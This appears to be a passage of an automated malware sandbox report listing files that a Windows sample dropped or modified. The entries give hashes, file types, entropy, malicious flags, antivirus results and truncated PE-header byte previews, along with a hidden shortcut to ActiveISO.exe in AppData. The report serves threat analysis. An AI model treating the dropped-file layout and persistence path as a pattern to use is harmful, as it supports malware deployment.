                                                                                                                SSDEEP:98304:dEURJ067t6RrQDV4ApyS4qA8R+vVbFqj3raWqt9pueo9eO:S6J0SSrQZlATJ2SpxBO
                                                                                                                MD5:999DD48C573FBD7D94A54760A168E42A
                                                                                                                SHA1:E509F0ACFE84F065FCC3A6B0AE5A81AE237CABD1
                                                                                                                SHA-256:07C14D4688B05C3117C01F78F88E2BF775EDF2B2093A0FB334BDB466C34CC750
                                                                                                                SHA-512:46ED4E2C0D3D18EA36CE9A974618B8520C09F331E394F04AF520F240107CBFA6E11AA36BCF7B9721A7BB3EE64C8E97841DE4FEFBDAF04A5257DCF791F61E283E
                                                                                                                Malicious:false
                                                                                                                Preview:.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................
                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):2647040
                                                                                                                Entropy (8bit):6.737542749825899
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:2gIVhybLGbJ59ppA4z66v2VxSY/Rla1Biw1vPaCreD5iVB0J97t2ma0BEbfBAJcn:2nrV/Ay2lE2vHA
                                                                                                                MD5:871F98EAF7C9A4A6074ACF0F0B78B7E5
                                                                                                                SHA1:1EC94386CD6ACB3EF0C9CE61806EADF1C2EE02E5
                                                                                                                SHA-256:4457F18AB3374B760942A7443A7D9001B748B1A87813B78A5C89D0CABD6C0331
                                                                                                                SHA-512:6B4CD3305D6F748C17D0F19C8CF25CE3098717A6453AEA8D132C10DEAFCAC569D3570B723A34C888A74E505A73F65341492185595B48E6D71606EA5B62028007
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...i..Y..................%..P(..b..W..........@.............................@/.....L.(...`... ......................................................./.8.....'..i........... /............................. .'.(...................X................................text.....%.......%.................`..`.data.........%.......%.............@....rdata..(.....'.......&.............@..@.pdata...i....'..j....'.............@..@.xdata...R....(..T....'.............@..@.bss.... a...p(..........................idata...............D(.............@....CRT....0............J(.............@....tls........../......L(.............@....rsrc...8...../......N(.............@..@.reloc....... /......P(.............@..Bhwn..........0/......T(.............@...................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2647040
                                                                                                                Entropy (8bit):6.737542749825899
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:2gIVhybLGbJ59ppA4z66v2VxSY/Rla1Biw1vPaCreD5iVB0J97t2ma0BEbfBAJcn:2nrV/Ay2lE2vHA
                                                                                                                MD5:871F98EAF7C9A4A6074ACF0F0B78B7E5
                                                                                                                SHA1:1EC94386CD6ACB3EF0C9CE61806EADF1C2EE02E5
                                                                                                                SHA-256:4457F18AB3374B760942A7443A7D9001B748B1A87813B78A5C89D0CABD6C0331
                                                                                                                SHA-512:6B4CD3305D6F748C17D0F19C8CF25CE3098717A6453AEA8D132C10DEAFCAC569D3570B723A34C888A74E505A73F65341492185595B48E6D71606EA5B62028007
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...i..Y..................%..P(..b..W..........@.............................@/.....L.(...`... ......................................................./.8.....'..i........... /............................. .'.(...................X................................text.....%.......%.................`..`.data.........%.......%.............@....rdata..(.....'.......&.............@..@.pdata...i....'..j....'.............@..@.xdata...R....(..T....'.............@..@.bss.... a...p(..........................idata...............D(.............@....CRT....0............J(.............@....tls........../......L(.............@....rsrc...8...../......N(.............@..@.reloc....... /......P(.............@..Bhwn..........0/......T(.............@...................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 14 17:56:09 2024, mtime=Thu Nov 14 17:56:10 2024, atime=Wed Nov 13 08:57:16 2024, length=1266616, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):968
                                                                                                                Entropy (8bit):4.982363829982808
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:8ZS1B64oo0N+2Chj55i1Y//8PCLIq2zafxgjEjA/NHUuMkXg1MJMag+M8JI8JzBc:8ZSPNB2O59ucT2euUAKBoBg+HJzJtm
                                                                                                                MD5:73C3022C1FA195DB411BA5E7FFBB9131
                                                                                                                SHA1:4DAE28903CEFC2FCD812205B70689A69E65FD075
                                                                                                                SHA-256:45F6A3CCA7D68DC2C3421F2ADA2916E0B4958CA793AC1179566527DF305D59E9
                                                                                                                SHA-512:9C82F31E337ABF15B6F5E374ADE9D9FDFEE010328013988C82DA9F0292AB017F1CC2AC1AFBCB6C0812C52A5A53B0D7F09F0D1281BC61953B18776B4748C8F3BC
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.... ....MN..6...o...6...&hk.5...S........................:..DG..Yr?.D..U..k0.&...&......Qg.*_...d)c..6...=Z..6......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=nY............................3*N.A.p.p.D.a.t.a...B.V.1.....nY....Roaming.@......EW.=nY............................`s..R.o.a.m.i.n.g.....d.1.....nY....UPLOAD~1..L......nY..nY......z!........................U.p.l.o.a.d.H.o.s.t._.U.W.....h.2..S..mY(O .ACTIVE~1.EXE..L......nY..nY.......!........................A.c.t.i.v.e.I.S.O...e.x.e.......m...............-.......l...........O*#%.....C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe..A.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.U.p.l.o.a.d.H.o.s.t._.U.W.\.A.c.t.i.v.e.I.S.O...e.x.e.`.......X.......216865...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1266616
                                                                                                                Entropy (8bit):6.275567294044985
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:RWiPQmboElHjsxc93LwnfXlP0CT7T4ir7XFXTqlj02F:5Qrat3knTvT4yDpqlj/F
                                                                                                                MD5:B84DFABE933D1160F624693D94779CE5
                                                                                                                SHA1:AC0133C09708FE4A3C626E3BA4CDF44D3A0E065F
                                                                                                                SHA-256:588CB61B36A001384A2833BD5DF8D7982CA79D6AE17A3D83A94E01B1E79684BD
                                                                                                                SHA-512:EEAEEF8D6B5FA02DEDF9818BABAA4B5FFDB87300521883AA290289DCC720B3D543279085ED3FC649B74654143E678502E56EB3F92C4BAF53C075977DE33C1B0E
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........s..G..CG..CG..C.n.CF..C.n.BX..C.n.BM..C.n.BC..C.n.BA..C.L.BF..C.L.BM..CSy.BO..CNjpCS..CG..Cu..C..(CD..C.L.BQ..C.L.BM..C.o.B`..C.o.CF..CG.tCF..C.o.BF..CRichG..C........................PE..d....~.e.........."....#.....<.................@.....................................y....`.............................................................8........>...(...+...`..................................(...@...@............0...)...........................text............................... ..`.rdata..0....0......................@..@.data....w.......L..................@....pdata...>.......@...D..............@..@.rsrc...8...........................@..@.reloc.......`......................@..B........................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6133880
                                                                                                                Entropy (8bit):6.6556462442857764
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:8TjAe4iOtBel1xJsv6tWKFdu9C0eo74QerqfAR:8TjAetoBEJsv6tWKFdu9C017derqfAR
                                                                                                                MD5:8C735052A2D4E9B01B0E028F0C20F67C
                                                                                                                SHA1:B72BDE11DE3310A495DD16520362F4ADBF21717A
                                                                                                                SHA-256:D751AB0357F71586B1793CE4166295ABA085334647D6E3FFCD49287A801273E7
                                                                                                                SHA-512:0BBD920E1B48361C7F3E1540DDB12FA6C9146BFE36E13EBA2B2E6CA8BF3AD961D88121C6F70ECA6D9EA413900455E696F7233C5BB54415CA7D2C9C1C0D4C1FB3
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............]...]...]..@]...]...\...]9l.]...]...\...]...\...]...\...]..\...]..\...]...]...]0..\...]0..\W..]0..\...]5.,]...]..D]...]0..\...]Rich...]................PE..d.....n].........." ......-.../.....$",......................................@^......-^...`...........................................S.......Z.......^......`[..q....].x.....^.."....L.T.....................L.(...p.L..............................................text.....-.......-................. ..`.rdata....,.......,...-.............@..@.data.........Z..P....Z.............@....pdata...q...`[..r....Z.............@..@.tls..........]......T].............@....gfids..,.....]......V].............@..@.rsrc.........^......X].............@..@.reloc..."....^..$...^].............@..B................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6494840
                                                                                                                Entropy (8bit):6.661788186831622
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:Olbw69/oyRlQ3bseHmQL7cE6Vvz4IBeEsBvf6MGde7l8UkqolD/SrneTbfrh4y+8:Olbw6a6GpcZsBv6szezn9IPRs9
                                                                                                                MD5:34893CB3D9A2250F0EDECD68AEDB72C7
                                                                                                                SHA1:37161412DF2C1313A54749FE6F33E4DBF41D128A
                                                                                                                SHA-256:CA8334B2E63BC01F0749AFEB9E87943C29882131EFE58608EA25732961B2DF34
                                                                                                                SHA-512:484E32832D69EC1799BD1BCC694418801C443C732ED59ECD76B3F67ABF0B1C97D64AE123728DFA99013DF846BA45BE310502EF6F8DA42155DA2E89F2A1E8CB2C
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Ke[...5...5...5..|....5......5.4Z6...5.4Z1...5.4Z4...5.4Z0...5.|f4...5..Z4...5...4...5..Z1...5..Z0.W.5..Z5...5..Z...5.......5..Z7...5.Rich..5.................PE..d...>.n].........." .....f9...)......Z9.......................................c.......c...`.........................................`.C.<.....\.@.....c......._.<.....c.x.....c..,..0r?.T...................(s?.(....r?...............9../...........................text...be9......f9................. ..`.rdata...b$...9..d$..j9.............@..@.data........]..T....].............@....pdata..<....._......"_.............@..@.gfids..4....`c.......b.............@..@.tls.........pc.......b.............@....rsrc.........c.......b.............@..@.reloc...,....c.......b.............@..B................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1314424
                                                                                                                Entropy (8bit):6.382115484562211
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:txQym4jK56LNWz/m7iNBd3ol84iKiEanXC:t1mrCNxiNBulliKiEaXC
                                                                                                                MD5:FE5ED4C5DA03077F98C3EFA91ECEFD81
                                                                                                                SHA1:E23E839EC0602662788F761EBE7DD4B39C018A7F
                                                                                                                SHA-256:D992AAEB21CB567113126C2912CF75E892C8E3EAD5D50147A11ABE704B9E2E2B
                                                                                                                SHA-512:22514732A0EDF8FC2B8770139599132429080B86D2844143D21BB834CBDDAAA077D763969960E39E2050A69493C1AAE191600E5DF6107BDE90FAE589A054F071
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y?1.8Qb.8Qb.8Qb.@.b.8Qb.fRc.8Qb.fUc.8Qb.fPc.8Qb.fTc.8Qb.ZPc.8Qb.fPc.8Qb.8Pb`;Qb.fTc.8Qb.fQc.8Qb.f.b.8Qb.8.b.8Qb.fSc.8QbRich.8Qb........PE..d.....n].........." .........z...............................................`............`......................................... ...._...#..,....0....... ..T.......x....@.........T......................(...0................... ............................text...7........................... ..`.rdata...=.......>..................@..@.data....4......."..................@....pdata..T.... ......................@..@.gfids..4...........................@..@.tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):324216
                                                                                                                Entropy (8bit):6.424811123526958
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:n5BVjwbCL85ofdeA2aqWs+41FwneMKAaol1cafGR27M1ffqp+1eszZnDy4SA:nBjwE8aVK
                                                                                                                MD5:D0634933DB2745397A603D5976BEE8E7
                                                                                                                SHA1:DDEC98433BCFEC1D9E38557D803BC73E1FF883B6
                                                                                                                SHA-256:7D91D3D341DBBA568E2D19382E9D58A42A0D78064C3AD7ADFE3C7BB14742C2B1
                                                                                                                SHA-512:9271370CD22115F68BD62572640525E086A05D75F5BC768F06E20B90B48A182F29A658A07099C7BC1E99BF0FFCF1229709524E2AF6745D6FED7B41C1ADDD09F1
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r.....}...}...}.k.}...}.M.|...}.M.|...}.M.|...}.M.|...}.q.|...}zM.|...}...}...}zM.|...}zM.|...}.Mc}...}...}...}zM.|...}Rich...}................PE..d....n].........." .........................................................0.......H....`..........................................M...p.......................&......x.... ..@.......T.......................(.......................P"...........................text............................... ..`.rdata..............................@..@.data...............................@....pdata...&.......(..................@..@.gfids..4...........................@..@.tls................................@....rsrc...............................@..@.reloc..@.... ......................@..B................................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5539448
                                                                                                                Entropy (8bit):6.61165878012579
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:oSIq7lPpagrGUtPm3qBF+1jIJJAi+eVq8:oSI8hagrGUtPm3KMRIL+e/
                                                                                                                MD5:C502BB8A4A7DC3724AB09292CD3C70D6
                                                                                                                SHA1:FF44FDDEEC2D335EC0EAA861714B561F899675FD
                                                                                                                SHA-256:4266918226C680789D49CF2407A7FEC012B0ED872ADAFB84C7719E645F9B2E6D
                                                                                                                SHA-512:73BEF89503CE032FBA278876B7DAB9EAC275632DF7A72C77093D433C932272DA997E8FBEB431A09D84BAAC7B2AB2E55222FF687893311949A5603E738BFA6617
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;....b..b..b.v.H.wb.D<.|b.D<.ub.D<.{b.D<.hb....ub..<.zb..b.no..<..b..<.~b..<$.~b..bL.~b..<.~b.Rich.b.................PE..d.....n].........." ......3... .......3.......................................T......4U...`......................................... .D.TQ..t>M......@T.......P..e...pT.x....PT.... =@.T....................>@.(....=@...............4..h...........................text.....3.......3................. ..`.rdata........4.......4.............@..@.data........P..~....O.............@....pdata...e....P..f...rP.............@..@.gfids..4.... T.......S.............@..@.tls.........0T.......S.............@....rsrc........@T.......S.............@..@.reloc......PT.......S.............@..B................................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1505376
                                                                                                                Entropy (8bit):6.361832549375939
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:NbKpao+9Uybarjs1FHw9guJfkTK39MOCRZnVVWjk+amEObzznf9:NbKpaGEw9diEjkuEObzznf9
                                                                                                                MD5:41E19BA2364F2C834B2487E1D02BB99A
                                                                                                                SHA1:6C61D603DDDFE384A93AD33775B70681D0A396D9
                                                                                                                SHA-256:C040A25377028B0C28DB81A012DE786C803A0E9D6F87CE460335A621D31F5340
                                                                                                                SHA-512:6EBF4A9E80F16C6A03FF357D2DA9A34A4227BFD65EB66D1D335349A77BA066D069BA0D47D46229B3C77B59052C42D388678662F970B418D8CC3CFB1223427D8C
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ho..ho..ho.....ho.....ho.....ho..hn.{ho......ho.....Zho.....ho.....ho......ho......ho......ho.Rich.ho.................PE..d...u.NK.........." .........2...............................................P............@.............................................C6......d............p..$u......`.... ......`...............................................X................................text............................... ..`.data............^..................@....pdata..$u...p...v..................@..@.idata..............................@....rsrc...............................@..@.reloc...&... ...&..................@..B................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4608873
                                                                                                                Entropy (8bit):7.958889302680503
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:yrR9F0WCyNwWKIVyFlF5a8qLn6WK/M4jb64MbzGzpZ3ICk:QjFnnxxyFPiZK/MCgbzGT3ICk
                                                                                                                MD5:0ABD50C8D2FAE352F4017D0177C63DD6
                                                                                                                SHA1:597C7AACA89C0D281BA5713799FCAE97C595321C
                                                                                                                SHA-256:3292060C07C495ED061CF362CE7788B977B111A8F163CA2F5038080DED66D14B
                                                                                                                SHA-512:28AC1F826F00D8E70BAC19773EEC4D14F0EB308AD33229DC900855B45BFCFC7EA4AF4D2B025342EB96E9B6BB17D0FE47577B031177653220720B361D0397A6FC
                                                                                                                Malicious:false
                                                                                                                Preview:..I.`C.Bn..Tk[]g.....Y....HnB.KU.s.U..`...D.cc.tm`M..bS.....vi..b.......IZ.P.tiRpU.q..R.P..rCd[...o.VOQ]Xc..cM.V.ilY..\.sI...J.i...cd.b.wOF.^...mA.b.k.iX.`..Pwj...RL.xV......r^S..RTPk..._.Ak.TN.kZ....yV......h.\...y.g.e..Il.]..mXE_.M.O..l.KZ.tU\...WH.....RiK..p...EO.L.H..E.QH....qctw....L.A..\Cdv.Cf...Hl..HGVBM...pRdZ...WT...L]x..FX....l.E.`b.....k.KQdx...S.RVF.J.vI..SZ..ijbyV.c_..GBqShamxdX..T...Nd....L...r.S..Vs.^[J.S.^..IR....I..T..\T.v_.d.`..ns.WXbR....Od.....dEoJ..ZtT.lg.]vy.q.fs.g.W._....K...gY....M..lO.._.ujp..`.O..iAN..W..R..M`..E...L..Y.HDvVst.hb.MYp......wY..G..H..i...[T.A.Aprxmagr.s...R.MS..B.OjgJtZ..R.ia..jQ..o......nbPB..kQ..juD.j.Vqs\Vh..[..._.sd.Mj\mo.CLQTW..s.]...CJ.h.ly.Lf...g...y.M.As.ftxs..p.AV.h\...V.rA.ND..f..d..N..[..O.f_rr..G.dWwFiAxlb....obtEPy..K.d.....Dg._s...X]Ov...EXW.ts.cTY...MB.....d.fe..Gipq.^.C..H....r...KHkh.]..F[q..T...U.g^OL.k.ou.b..B_.W..fp.g.jevD..t.P.o...SOr.L...NJp[.ka.N.M..L.a..p....j...qT.....eX.k..lH..i....d..jd.G....`..DS.....lB.....GPps.....h
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):571312
                                                                                                                Entropy (8bit):6.492350759123951
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:Rsjw3shF+jss1I8CgEWTe5+YMCMGz2MMY5U489wiyaf+QEKZm+jWodEEVksLd:Rs/5U4RBaf+QEKZm+jWodEECsL
                                                                                                                MD5:7DB24201EFEA565D930B7EC3306F4308
                                                                                                                SHA1:880C8034B1655597D0EEBE056719A6F79B60E03C
                                                                                                                SHA-256:72FE4598F0B75D31CE2DC621E8EF161338C6450BB017CD06895745690603729E
                                                                                                                SHA-512:BAC5729A3EB53E9BC7B680671D028CABEF5EA102DFAA48A7C453B67F8ECB358DB9F8FB16B3B1D9EA5A2DFF34F459F6AC87F3A563C736D81D31048766198FF11E
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T4...U...U...U...'...U...-8..U...U...U..p/...U..p/...U..p/...U..p/...U..p/...U..p/T..U..p/...U..Rich.U..........PE..d...,pd..........." ... .H...b.......3..............................................r.....`A.........................................H..h...."..,...............8:.......'......8.......p...........................@...@............`...............................text....G.......H.................. ..`.rdata..b....`.......L..............@..@.data...P:...@.......(..............@....pdata..8:.......<...F..............@..@.rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):98736
                                                                                                                Entropy (8bit):6.474996871326343
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                MD5:F12681A472B9DD04A812E16096514974
                                                                                                                SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):38304
                                                                                                                Entropy (8bit):6.3923853431578035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:Xhh4pTUUtmUwqiu8oSRjez6SD7GkxZYj/9zLUr:xJ9x70GkxuZz2
                                                                                                                MD5:75E78E4BF561031D39F86143753400FF
                                                                                                                SHA1:324C2A99E39F8992459495182677E91656A05206
                                                                                                                SHA-256:1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E
                                                                                                                SHA-512:CE4DAF46BCE44A89D21308C63E2DE8B757A23BE2630360209C4A25EB13F1F66A04FBB0A124761A33BBF34496F2F2A02B8DF159B4B62F1B6241E1DBFB0E5D9756
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L......................h.........G.........:...h.......h.......h.......h.......h.+.....h.......Rich............................PE..d................." ... .:...6.......A..............................................B.....`A.........................................m.......m..x....................n...'......D....c..p...........................`b..@............P..`............................text....9.......:.................. ..`.rdata..."...P...$...>..............@..@.data................b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..D............l..............@..B................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\ActiveISO.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):15745
                                                                                                                Entropy (8bit):6.185378376185804
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:l/Yzs6zZ+ic3FE2IUZmwKy8mfOCdLnryfBsFhs:lgzsITfkmwKy8ZhKFW
                                                                                                                MD5:DD899CA13E5BEF55BCEA07E167DA891B
                                                                                                                SHA1:E883F0240F127520486F063B033FB34FA2DFE5C1
                                                                                                                SHA-256:A818D6FA8CADDAA608345EA40B75073A7C98637161794918566E2DDEEEDE47E7
                                                                                                                SHA-512:E38437899FCC433EF89A04C6A68684EA5110181AF48A4699836939CF167D0C1FE7932432518445E90ACBCBC151EE324D77DE064147D97FDEDF6ECABAAC788C06
                                                                                                                Malicious:false
                                                                                                                Preview:.m.c.T^YvvPEcE..l.avS...P.._..h..Dlx.hCl.fu......Ih.f...B..JIR..pG.c.G.iaX.g.d..T...u\.r..].Uu.V...k..R.WXwsZx.QMQ..S.r..^...ZZ.b.a...n`jfH.`]SKoUQw..D.......s...tY..OT.b..lENXo.p...Hd.RWjEw.......Y..u.C.......rp.a.V.oN\c_UC.ox.Q......X....YwX..tkn.V...g.W^c._B....EdgW.gu.YN..ICA.p.....Z.o.ev.N..tH....pyyLt.T..A.XHk.duaxpkY.AUT.....gp.TCn..Sxjm...EM...Cb[U.t.ZGlC.c.dT.mYl...R.nJ.....drk..qLuv.y.q..COa.....D....hU._..e.....^]..C.X..IP.Z.BXf.X.b....y.QwB.txZ..^B.....Mp\j...Z.il.f...UQ.x.e`.^.....Mw.Z....ud[oVNa..d..o.HJsP.wY...Af...A.M.Ur.X..S.i[j..VE...I..iiqH...s^...B.I..ZV....`rUNP.....n...JS..Qq..R..Qvar...Z.Ce..Vac[S...I.[.D.....D.qWS.k.V]vG.EVLk..v.XwoA....w..lE.n.m..UPm.Iai.u.......kAhf.Q.n.t.g.v.^P..c._.hC\b.cpc..L.......o...C`.`Q.O..NF.[.V.e..U\hj.X.u.ZHnL.f.....SAm.G..X]..X.FJ....K.....j[..e.ndEI..cDq..bB.a.fDX...YK....Tm.rAK.......I......HotwdB..K.v^qM.mM.`Rc..LI..LKR.......Rv.L....qO....`l..vG.Vjt.N...If[..A..`....h...t.t]...b..re.fm.PqOik.faF.U.J..X..FKG.\H.B..I..WXA._..R.N.
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6133880
                                                                                                                Entropy (8bit):6.6556462442857764
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:8TjAe4iOtBel1xJsv6tWKFdu9C0eo74QerqfAR:8TjAetoBEJsv6tWKFdu9C017derqfAR
                                                                                                                MD5:8C735052A2D4E9B01B0E028F0C20F67C
                                                                                                                SHA1:B72BDE11DE3310A495DD16520362F4ADBF21717A
                                                                                                                SHA-256:D751AB0357F71586B1793CE4166295ABA085334647D6E3FFCD49287A801273E7
                                                                                                                SHA-512:0BBD920E1B48361C7F3E1540DDB12FA6C9146BFE36E13EBA2B2E6CA8BF3AD961D88121C6F70ECA6D9EA413900455E696F7233C5BB54415CA7D2C9C1C0D4C1FB3
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............]...]...]..@]...]...\...]9l.]...]...\...]...\...]...\...]..\...]..\...]...]...]0..\...]0..\W..]0..\...]5.,]...]..D]...]0..\...]Rich...]................PE..d.....n].........." ......-.../.....$",......................................@^......-^...`...........................................S.......Z.......^......`[..q....].x.....^.."....L.T.....................L.(...p.L..............................................text.....-.......-................. ..`.rdata....,.......,...-.............@..@.data.........Z..P....Z.............@....pdata...q...`[..r....Z.............@..@.tls..........]......T].............@....gfids..,.....]......V].............@..@.rsrc.........^......X].............@..@.reloc..."....^..$...^].............@..B................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6494840
                                                                                                                Entropy (8bit):6.661788186831622
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:Olbw69/oyRlQ3bseHmQL7cE6Vvz4IBeEsBvf6MGde7l8UkqolD/SrneTbfrh4y+8:Olbw6a6GpcZsBv6szezn9IPRs9
                                                                                                                MD5:34893CB3D9A2250F0EDECD68AEDB72C7
                                                                                                                SHA1:37161412DF2C1313A54749FE6F33E4DBF41D128A
                                                                                                                SHA-256:CA8334B2E63BC01F0749AFEB9E87943C29882131EFE58608EA25732961B2DF34
